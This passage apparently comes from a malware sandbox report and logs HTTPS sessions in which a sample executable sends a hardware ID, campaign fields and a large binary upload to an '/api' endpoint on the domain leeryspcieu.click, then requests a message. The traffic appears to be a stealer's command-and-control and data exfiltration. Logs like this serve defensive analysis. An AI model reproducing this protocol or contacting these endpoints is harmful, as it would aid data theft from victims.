                                                                                                                                    Data Ascii: --0ADCPECMNContent-Disposition: form-data; name="hwid"F771030F9526602D0EE189CCD4D6D92A--0ADCPECMNContent-Disposition: form-data; name="pid"3--0ADCPECMNContent-Disposition: form-data; name="lid"c2CoW0--viki-1--0ADCPECMNContent-Dis
                                                                                                                                    2025-01-01 15:54:02 UTC5183OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9d 1b 88
                                                                                                                                    Data Ascii: un 4F([:7s~X`nO`i`
                                                                                                                                    2025-01-01 15:54:03 UTC1133INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 01 Jan 2025 15:54:02 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    Set-Cookie: PHPSESSID=3ao2ids7bcosb5n1h5fcafo0ck; expires=Sun, 27 Apr 2025 09:40:41 GMT; Max-Age=9999999; path=/
                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                    Pragma: no-cache
                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                    vary: accept-encoding
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qhGPP8NzWVZVUBVxB%2FPsyioOfCDGNwcnScibqmEjS4GLmHkk7VMLlIOewtsfsga6jwJ1LegGu04VlCKYK5oKUCmcK9M7756p6%2FUmya161m302GemB2qYrvjl%2FFTFVLviYAOu3Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8fb3af85596f440b-EWR
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2470&min_rtt=2467&rtt_var=931&sent=10&recv=27&lost=0&retrans=0&sent_bytes=2845&recv_bytes=21468&delivery_rate=1171749&cwnd=230&unsent_bytes=0&cid=159cfa9f8ef63651&ts=653&x=0"
                                                                                                                                    2025-01-01 15:54:03 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                    Data Ascii: fok 8.46.123.189
                                                                                                                                    2025-01-01 15:54:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    5192.168.2.549980172.67.219.1334436464C:\Users\user\Desktop\qnUFsmyxMm.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2025-01-01 15:54:04 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Content-Type: multipart/form-data; boundary=C6D00O4HZE40U0P76
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                    Content-Length: 1239
                                                                                                                                    Host: leeryspcieu.click
                                                                                                                                    2025-01-01 15:54:04 UTC1239OUTData Raw: 2d 2d 43 36 44 30 30 4f 34 48 5a 45 34 30 55 30 50 37 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 37 37 31 30 33 30 46 39 35 32 36 36 30 32 44 30 45 45 31 38 39 43 43 44 34 44 36 44 39 32 41 0d 0a 2d 2d 43 36 44 30 30 4f 34 48 5a 45 34 30 55 30 50 37 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 43 36 44 30 30 4f 34 48 5a 45 34 30 55 30 50 37 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 76 69 6b 69 2d 31 0d 0a
                                                                                                                                    Data Ascii: --C6D00O4HZE40U0P76Content-Disposition: form-data; name="hwid"F771030F9526602D0EE189CCD4D6D92A--C6D00O4HZE40U0P76Content-Disposition: form-data; name="pid"1--C6D00O4HZE40U0P76Content-Disposition: form-data; name="lid"c2CoW0--viki-1
                                                                                                                                    2025-01-01 15:54:04 UTC1134INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 01 Jan 2025 15:54:04 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    Set-Cookie: PHPSESSID=32og1e2g4gteuihtsi2g0fubka; expires=Sun, 27 Apr 2025 09:40:43 GMT; Max-Age=9999999; path=/
                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                    Pragma: no-cache
                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                    vary: accept-encoding
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M%2FkALr4zG0fwUBrgUm6Q8X1wbu%2Fmhm0Ogz3QXvgwQMR4wfno5A45OF17iPGWJ2GLcvFVWxX643Gv1GxBsS36SkOvenT6P1JeHIbEeyr%2FECr0l%2Bd5tf%2Bg34GFuUtgU1dOTrnr6w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8fb3af904ed64277-EWR
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1830&min_rtt=1760&rtt_var=710&sent=5&recv=9&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2156&delivery_rate=1659090&cwnd=191&unsent_bytes=0&cid=ad0a6048e011f6e9&ts=460&x=0"
                                                                                                                                    2025-01-01 15:54:04 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                    Data Ascii: fok 8.46.123.189
                                                                                                                                    2025-01-01 15:54:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    6192.168.2.549981172.67.219.1334436464C:\Users\user\Desktop\qnUFsmyxMm.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2025-01-01 15:54:05 UTC283OUTPOST /api HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Content-Type: multipart/form-data; boundary=WEK41AY1KJLIER2YQ
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                    Content-Length: 577242
                                                                                                                                    Host: leeryspcieu.click
                                                                                                                                    2025-01-01 15:54:05 UTC15331OUTData Raw: 2d 2d 57 45 4b 34 31 41 59 31 4b 4a 4c 49 45 52 32 59 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 37 37 31 30 33 30 46 39 35 32 36 36 30 32 44 30 45 45 31 38 39 43 43 44 34 44 36 44 39 32 41 0d 0a 2d 2d 57 45 4b 34 31 41 59 31 4b 4a 4c 49 45 52 32 59 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 57 45 4b 34 31 41 59 31 4b 4a 4c 49 45 52 32 59 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 76 69 6b 69 2d 31 0d 0a
                                                                                                                                    Data Ascii: --WEK41AY1KJLIER2YQContent-Disposition: form-data; name="hwid"F771030F9526602D0EE189CCD4D6D92A--WEK41AY1KJLIER2YQContent-Disposition: form-data; name="pid"1--WEK41AY1KJLIER2YQContent-Disposition: form-data; name="lid"c2CoW0--viki-1
                                                                                                                                    2025-01-01 15:54:05 UTC15331OUTData Raw: 81 05 9a e4 04 d0 ac 30 70 19 04 fe 2a ad 18 44 82 17 f6 52 b5 b3 ad c4 ea da 5b 33 16 e9 fe bc bf 5f 08 82 8f bf 2b cb 5f a9 c1 38 0f 0f ea 79 4b fe 8c f1 ff 42 6a d2 97 3d 3b 11 26 a5 fd 2f bf fb 8f 54 fb 79 fd 72 7f ee cf 0f f4 aa f0 40 76 45 9a ee 2c ba c2 4a 2e b2 1a 77 fe 07 50 9a 1e ff bf db 4d fe ef 03 3c 44 07 e0 cc 14 05 5a 09 84 7e 43 58 b0 f1 41 fb 68 46 4d 26 28 8c 77 12 bd d0 d0 6f 17 92 fd 98 fb 33 46 08 e9 4f 65 bd 4e db 11 00 52 8d b4 60 78 7c b0 17 ec 8c 81 1e 7b 43 fa ae ec 3d 3d cd c1 18 77 5a a3 3c ee f8 aa b3 1c ea 72 85 73 c7 6e db bc 05 d4 12 29 01 e1 f6 51 89 c2 4c 5f f3 d8 43 ed 9c 48 3a 3a 89 eb 75 2f 45 f4 08 e7 7a 3b 0a 02 bf 5f 99 4e ee a7 35 4e 9f a2 73 7b 7e 50 43 75 fb bc 89 0b 9b 34 d1 73 63 62 07 d4 05 65 c3 bf 7d 03 48
                                                                                                                                    Data Ascii: 0p*DR[3_+_8yKBj=;&/Tyr@vE,J.wPM<DZ~CXAhFM&(wo3FOeNR`x|{C==wZ<rsn)QL_CH::u/Ez;_N5Ns{~PCu4scbe}H
                                                                                                                                    2025-01-01 15:54:05 UTC15331OUTData Raw: 5b b0 6a ed 12 85 bd 60 bf 8b 14 60 21 00 ee 50 d5 c3 e5 d1 00 1f 62 c2 a3 95 78 8d 1c d1 bd 0c 4f b1 b9 f6 91 c4 9f 29 55 36 a2 32 f3 3a d4 39 ab 11 6c 8e e2 b2 bf d1 76 6e 08 75 de d0 0f 41 df 25 f8 a4 3a 56 aa 61 e1 97 11 e3 99 7d 49 78 f6 f3 0a 7f 0b 6d 90 56 1a 66 89 a0 e5 15 22 00 5b 0f bb 33 28 cc 7a 00 e8 56 06 ff 9b 64 e7 80 a5 1f 20 b3 10 e4 7e 49 39 78 b6 89 22 c8 75 7b 92 ff df be ed f2 a9 e2 c9 e6 0a 90 00 90 44 de f3 b9 cf 13 07 22 bb 34 64 50 90 00 eb 83 b8 e8 a4 48 07 70 de 09 67 29 8e 48 3b 40 87 42 2f 80 81 c7 d5 4c 8f 62 8b 82 57 cd f9 97 4e dd 9b 87 5d 30 58 93 6d bb 2b bb af 20 6e a8 cb 80 07 98 a5 7b a3 85 69 0e d9 a8 6e 33 38 26 68 36 22 3d 65 48 db 51 c5 58 c6 47 bd f9 ae 9a d0 71 bc c4 47 dc 10 3c f8 30 13 f5 5a a9 58 8f 52 b0 b7
                                                                                                                                    Data Ascii: [j``!PbxO)U62:9lvnuA%:Va}IxmVf"[3(zVd ~I9x"u{D"4dPHpg)H;@B/LbWN]0Xm+ n{in38&h6"=eHQXGqG<0ZXR
                                                                                                                                    2025-01-01 15:54:05 UTC15331OUTData Raw: da bf cb 40 dd 76 0e 1f f9 a8 bc 9e e5 92 10 ff 4b 03 a9 e1 33 88 8e 51 e8 ce d0 30 5b fd 25 6f c7 4b b8 32 91 3a 91 66 59 a3 9e 12 ee d2 e9 3a 76 69 2b d9 57 a4 1d a3 f1 a7 0f 4b ec e6 78 2a 88 1d 49 4d 63 79 d4 ee 4e f7 70 76 8a d8 21 b2 69 a1 82 7c 55 2b 72 f5 0c 5d 15 b5 63 4f 6a 62 b2 3a 6b 62 66 be 9a 95 c9 20 4f 34 a4 ff c5 85 0f a1 fa 13 bf 6d d9 0f 32 d2 65 c2 2f 97 09 d4 57 6e 31 d7 47 c6 62 66 f8 a9 ed 84 af 0d 67 bf 6e 76 7c d1 d8 77 4b 92 96 ba f4 2a 2d 3d c4 0c 81 80 a0 98 58 99 02 1b c4 85 6b 0b 28 72 18 04 31 65 c0 55 ac ae 24 44 d4 d2 28 50 7f 68 72 fd fc a8 e9 9e a3 a0 97 1f a3 9a ca 31 cf 07 19 14 ea e5 1f a6 15 e1 5f f5 73 4a ff f4 35 d4 b9 fd 41 1e 74 d5 61 3f ac 67 3d db f3 5e 0c 58 5e 01 96 98 b2 8f 80 2a b9 ee ee 7a 20 43 0d 14 c6
                                                                                                                                    Data Ascii: @vK3Q0[%oK2:fY:vi+WKx*IMcyNpv!i|U+r]cOjb:kbf O4m2e/Wn1Gbfgnv|wK*-=Xk(r1eU$D(Phr1_sJ5Ata?g=^X^*z C
                                                                                                                                    2025-01-01 15:54:05 UTC15331OUTData Raw: 1f f5 7a 03 12 17 f1 06 82 ed 88 aa cf 52 e4 cc 90 b8 ae 56 5b 2e c0 c3 29 33 07 c9 39 55 52 bd bc 6b ec 20 05 3a 8a a2 fb e1 55 42 3c 5e 86 af 24 0f 5f 67 48 13 e8 ba 99 ef cf 8c be 1a 6d c6 84 15 de 56 b9 f8 a8 24 e2 33 5a 77 72 16 99 53 04 17 fe c1 87 40 97 bb 79 a8 d8 d6 8c 2a 01 41 68 0c 53 8e 8e 40 91 55 11 3f 6f 16 98 07 1c 2f 39 ad d1 1c e2 b7 1e 6d 4f 6e b5 e9 fe 02 11 d0 f7 c5 41 c7 af ec 35 a0 1c 4d b9 d7 ea ea 44 5b e9 d4 d5 70 db ea 9b 56 77 56 30 49 af c3 b7 f0 46 e9 ca c0 56 c5 bf 14 c2 80 40 2e 68 d7 06 03 c5 0f ba 66 b8 9b 14 9c 15 80 fc e8 c8 a0 8d c2 f7 16 8e d2 a1 37 f5 56 03 e1 9e 7f 27 33 ec 0b 2d f9 39 76 e0 fa 69 02 16 ed ba c2 0d 29 38 90 00 29 16 21 c2 8f d8 f9 b9 1f 83 c1 dc 84 6b 0b ea d0 52 58 68 64 64 10 39 dc 6f 53 b3 9f 8f
                                                                                                                                    Data Ascii: zRV[.)39URk :UB<^$_gHmV$3ZwrS@y*AhS@U?o/9mOnA5MD[pVwV0IFV@.hf7V'3-9vi)8)!kRXhdd9oS
                                                                                                                                    2025-01-01 15:54:05 UTC15331OUTData Raw: 3b 47 05 5f 7b 34 aa 31 40 e2 e0 13 86 e4 9a b5 fe 36 23 bb 04 e2 28 e7 59 6a 9c 8f 34 e3 5b db a8 ad a9 59 6a 0b 6a 99 66 e7 04 2f a5 47 a5 0b 4c 3e 62 fc ac 46 f4 ff 59 4a 5f 4c a5 95 6b bc a3 4a 68 29 db d6 23 db ac ce 48 45 d1 35 4a e2 57 1c fd 71 cb 8a 7d a2 95 95 62 b6 d2 40 42 b6 88 48 b2 f4 db 89 af 1f 0b 5b 78 25 3f 15 c3 80 5d ab 79 eb db bd f4 5b dc 17 8e 8d b5 61 8c e9 ad 6f 95 f0 34 ae 43 1f 76 e2 78 28 b3 aa 24 1e ca df 57 25 f1 35 44 7c 67 7f fe 53 a8 ce d8 19 57 f7 be 97 e0 4b 3a ea bb d5 ed e6 9c 26 f9 70 4d 12 c5 f8 bb 65 e1 5b 70 c5 96 dd 06 33 c7 32 44 7c 24 ee 12 b8 32 9c 88 fa 48 be 70 7a 22 53 1d 0f cd c6 8c da e6 d4 44 71 dd 23 52 38 1a e7 59 e6 10 42 c8 c8 81 3c 85 cd ba 8b ca 80 b0 36 d8 f5 f3 96 21 3b c3 7d dd 72 c8 55 01 44 1d
                                                                                                                                    Data Ascii: ;G_{41@6#(Yj4[Yjjf/GL>bFYJ_LkJh)#HE5JWq}b@BH[x%?]y[ao4Cvx($W%5D|gSWK:&pMe[p32D|$2Hpz"SDq#R8YB<6!;}rUD
                                                                                                                                    2025-01-01 15:54:05 UTC15331OUTData Raw: 59 32 49 8d ba 69 f1 68 75 7e 60 66 75 bb bc 66 bb 4f 35 81 d1 cd cd 67 88 76 56 87 dc c0 01 b3 64 43 41 b1 17 62 e0 47 54 96 4a dc 00 43 0b 44 4c ed 2d 3f 8b 03 3b 44 50 b2 81 57 5b b2 8f 9b ca da d3 67 4c 48 77 03 6c 2b 57 b3 97 f3 f4 b3 b8 2b ae db 2f 2f 43 60 7d f6 6f de d9 bf 88 40 c7 00 c9 10 3a dd c9 3d 0f 47 13 38 8b 8f 67 db 89 27 47 4e cf 51 34 71 b7 97 d6 c2 3b 25 2f 9c 71 be 9f 63 81 17 a9 5c 5a be 19 c0 cf b9 2b 77 5b e6 98 90 d5 97 8b 5a cb ce dc ab 8f 1a 3d 75 46 37 93 43 07 7b 46 d0 85 d6 17 7c 6b 6d 72 c7 b7 e4 1f f4 2c 7c 84 90 e2 35 80 62 8d af fd 08 d9 8f 8d b5 d4 69 60 18 da b5 02 b6 a1 b3 c8 ff 2e 41 8c 77 d9 b9 ec 48 15 69 78 2c a3 09 f7 3f d0 c5 04 4c fc 48 cd 19 27 f8 0e c8 0a 06 97 76 23 01 41 b4 39 68 6b 8c 51 07 fc fa c0 7c 67
                                                                                                                                    Data Ascii: Y2Iihu~`fufO5gvVdCAbGTJCDL-?;DPW[gLHwl+W+//C`}o@:=G8g'GNQ4q;%/qc\Z+w[Z=uF7C{F|kmr,|5bi`.AwHix,?LH'v#A9hkQ|g
                                                                                                                                    2025-01-01 15:54:05 UTC15331OUTData Raw: d3 9e 7f 86 e4 2d 7f 17 26 32 d1 b0 00 86 7f 51 06 dd 35 31 39 ef c6 b2 1d 88 d1 57 d2 82 4c c4 fb 4a a7 cf 37 b8 2a 67 cf 4f a4 9b 38 28 5e 56 7e ae 3f af d6 e1 96 60 5b af 24 1f a1 7b 59 38 89 a7 09 f9 85 36 12 b6 b7 9c 76 99 b4 4c 1c 09 ef c7 07 b9 43 d9 95 ab 6a e5 3f b1 c5 8f 23 c7 ee 9b e9 47 f0 40 6f 86 ba 47 46 54 e9 5f 89 dc cc a0 d2 67 7e 7f 4a bc bf 45 66 a8 06 bd 91 24 d3 7b c5 05 bb 7f 67 da 4a bc 3f 5d 5e 49 4f 11 24 fb 9c fe fd e7 6e 08 08 76 f6 f3 61 c0 23 e5 cc c7 ae c8 ec 44 ea ed 79 4d 76 8d 38 d7 d3 bf ec 49 9d 77 c5 0d 9e 96 c3 ea d1 57 fa 96 c7 4c 21 bb e3 ee f6 d7 b9 ff 7e af 78 1c a5 d1 2d 59 27 08 ef e5 78 33 58 18 dc ad 55 f1 70 fc f9 ad ec 30 e3 48 09 7d d4 6a 6d 2d d2 66 ce ad f9 4e de 5a 0e 22 13 01 46 16 da 31 9a fe 9e 91 87
                                                                                                                                    Data Ascii: -&2Q519WLJ7*gO8(^V~?`[${Y86vLCj?#G@oGFT_g~JEf${gJ?]^IO$nva#DyMv8IwWL!~x-Y'x3XUp0H}jm-fNZ"F1
                                                                                                                                    2025-01-01 15:54:05 UTC15331OUTData Raw: ba 21 d6 47 d7 fa 6e 6c d6 68 e6 f1 07 ba 1e 5f 6d b4 8d 1d 65 3c 50 94 6f ab 21 7a 8c 1d c6 45 ab 76 01 ee e4 7c d4 49 3c 5c 74 bb 63 ae 9e 6d e1 9e 9d 88 3b b0 53 1e 61 be c2 bc c6 83 a8 2a 64 e5 cb 9f e3 a4 91 52 08 89 e3 c2 5f c6 e9 fa 27 8e 8b 68 38 c2 b2 73 57 c7 6c 23 08 a3 b5 02 dc 5b c0 e6 ab b1 04 40 70 de 8c 5a a3 2d 08 b0 8b b7 48 f6 f1 c8 df 6b 27 6d b3 d1 31 6b e1 76 66 f5 77 31 94 b4 0d 4c cc f8 90 2e 46 ab 15 91 90 44 6c 65 22 59 c8 d9 9f 7f e3 e4 87 f9 3e 7e 27 1f 8f 8d 32 a3 30 9f 89 33 ce 61 f3 08 c5 65 5b 89 ca 4b 5f 27 35 db 1b 57 15 75 5e ed a0 a2 22 6e 4b 11 fa c2 df 1d c6 7b 02 d8 5f e4 d0 d1 56 e6 94 7e db cf 56 d2 93 5d 32 f7 cd 55 26 cf f5 e4 92 3b 2a 39 1f 8f e9 d2 48 be 5b a2 9b 6f 0e 74 28 ea 29 e1 13 eb d3 14 ec 30 84 fb df
                                                                                                                                    Data Ascii: !Gnlh_me<Po!zEv|I<\tcm;Sa*dR_'h8sWl#[@pZ-Hk'm1kvfw1L.FDle"Y>~'203ae[K_'5Wu^"nK{_V~V]2U&;*9H[ot()0
                                                                                                                                    2025-01-01 15:54:05 UTC15331OUTData Raw: 5b b9 08 fd ef b8 45 5e 99 f5 11 8f 7f 7b 6b fd db e6 d2 cf 5d 80 b7 da 04 20 61 01 e6 9d 7b dc 8b 03 16 b3 a9 8c 22 d1 e1 ac 0b 66 2f ea 01 b5 24 89 5a 2d 06 6e ec b4 cb a9 f7 f2 6a e0 19 93 1d ba 18 f0 bc 53 4c 3e a7 7a 9a e3 f6 a4 b9 f8 08 e7 c6 f7 58 29 78 2f eb 40 6a 8c 04 c0 77 e0 18 38 02 be 1b 05 cb 6e 7d d1 fe d2 c2 cb 74 a6 11 d1 e5 ce 16 97 2c 50 b0 6e 6c a7 70 4b 9e e6 31 60 69 91 dd 50 af b2 16 92 dc 82 24 96 a3 54 7b dc 90 5a ca 4a 7d 54 75 96 aa bc d0 fd 45 17 04 a9 92 03 b6 24 c0 87 75 33 41 43 99 a9 57 c5 7c 79 98 c5 cc e3 d1 1b a7 de 60 af 0c 35 a0 75 b7 e8 21 fd 3d 26 f9 e7 4a 34 93 e0 08 29 d0 db 80 07 c4 7c 80 12 af 3e 40 57 a2 29 25 9b 28 de d4 66 ee 8d 32 12 04 ab f6 6e f5 76 48 96 e0 16 85 d8 60 6c 1e be 63 6b d7 ac 19 2b 55 d4 b5
                                                                                                                                    Data Ascii: [E^{k] a{"f/$Z-njSL>zX)x/@jw8n}t,PnlpK1`iP$T{ZJ}TuE$u3ACW|y`5u!=&J4)|>@W)%(f2nvH`lck+U
                                                                                                                                    2025-01-01 15:54:07 UTC1133INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 01 Jan 2025 15:54:07 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    Set-Cookie: PHPSESSID=p35d0hnu51hklf9t4qsm0n5rj3; expires=Sun, 27 Apr 2025 09:40:45 GMT; Max-Age=9999999; path=/
                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                    Pragma: no-cache
                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                    vary: accept-encoding
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F17npHrlhzctzpgM0rnS1WKHkhNVRAEq6r9Bq5fdB6S6EDaUi1xlbKrfRZb2dRVhW6uG342Kg%2FEbgCbD2bgFCB88Jpu6lWg6Y5Jbm2lip1ddYCYdOwtdUMWmFlJs0NTtyjGu6g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8fb3af98ff3cc3f8-EWR
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1495&min_rtt=1471&rtt_var=600&sent=200&recv=594&lost=0&retrans=0&sent_bytes=2843&recv_bytes=579811&delivery_rate=1751649&cwnd=160&unsent_bytes=0&cid=0b7c03fc6a9c1a86&ts=1658&x=0"


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    7192.168.2.549982172.67.219.1334436464C:\Users\user\Desktop\qnUFsmyxMm.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2025-01-01 15:54:07 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                    Content-Length: 83
                                                                                                                                    Host: leeryspcieu.click
                                                                                                                                    2025-01-01 15:54:07 UTC83OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 63 32 43 6f 57 30 2d 2d 76 69 6b 69 2d 31 26 6a 3d 26 68 77 69 64 3d 46 37 37 31 30 33 30 46 39 35 32 36 36 30 32 44 30 45 45 31 38 39 43 43 44 34 44 36 44 39 32 41
                                                                                                                                    Data Ascii: act=get_message&ver=4.0&lid=c2CoW0--viki-1&j=&hwid=F771030F9526602D0EE189CCD4D6D92A
                                                                                                                                    2025-01-01 15:54:08 UTC1129INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 01 Jan 2025 15:54:08 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    Set-Cookie: PHPSESSID=smtai1j7o8jh85jab7nq5ren10; expires=Sun, 27 Apr 2025 09:40:47 GMT; Max-Age=9999999; path=/
                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                    Pragma: no-cache
                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                    vary: accept-encoding
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zyCoCOEcYQXibj%2BWknWOcLzM0OrHFrM1mCCZ70nmN38z7R5CUjSCVyuG6NPYyW2KkjIbwZ%2BgiA6YunaXjMghJNlpBTjwXSTHHj7LYm1TlCF9qKZyNbiFX%2FWwJZkgO5po6QARIw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8fb3afa6aea3c34a-EWR
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1525&min_rtt=1519&rtt_var=574&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=984&delivery_rate=1922317&cwnd=155&unsent_bytes=0&cid=e0b275a82ec89c65&ts=492&x=0"
                                                                                                                                    2025-01-01 15:54:08 UTC138INData Raw: 38 34 0d 0a 44 6e 66 70 6d 6f 59 4c 50 36 57 2b 58 4d 78 31 36 79 6d 61 41 65 44 63 4e 65 71 4d 35 38 63 6e 61 4c 61 79 33 50 76 43 4c 38 5a 56 44 4d 76 76 70 44 45 64 7a 63 6f 6f 76 41 62 52 64 62 56 64 7a 37 64 5a 67 2f 79 4e 70 6c 55 42 30 4e 4f 39 31 62 46 48 71 58 34 72 78 76 50 6f 66 32 44 47 30 69 79 54 54 64 4d 52 6f 69 2b 55 70 45 48 49 6f 4d 57 68 55 30 71 4d 67 76 44 5a 70 77 33 38 50 67 71 30 0d 0a
